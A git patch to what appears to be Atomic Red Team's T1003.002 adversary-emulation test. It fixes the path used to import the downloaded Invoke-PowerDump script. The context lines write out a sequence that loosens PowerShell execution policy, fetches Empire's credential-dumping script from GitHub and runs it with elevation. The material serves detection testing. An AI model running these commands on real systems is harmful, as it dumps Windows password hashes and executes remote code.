From 7d494dcbce336fbefea9b2d63d54b7205bf99bf7 Mon Sep 17 00:00:00 2001
From: tjgeorgen <67936042+tjgeorgen@users.noreply.github.com>
Date: Tue, 18 May 2021 10:51:47 -0400
Subject: [PATCH] Fix file path for PowerDump Import (#1466)

seemed to download the module to $Env:Temp then run from .\, so I changed both to $Env:Temp
---
 atomics/T1003.002/T1003.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
       Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
       Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
       Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-      Import-Module .\PowerDump.ps1
+      Import-Module "$Env:Temp\PowerDump.ps1"
       Invoke-PowerDump
     name: powershell
     elevation_required: true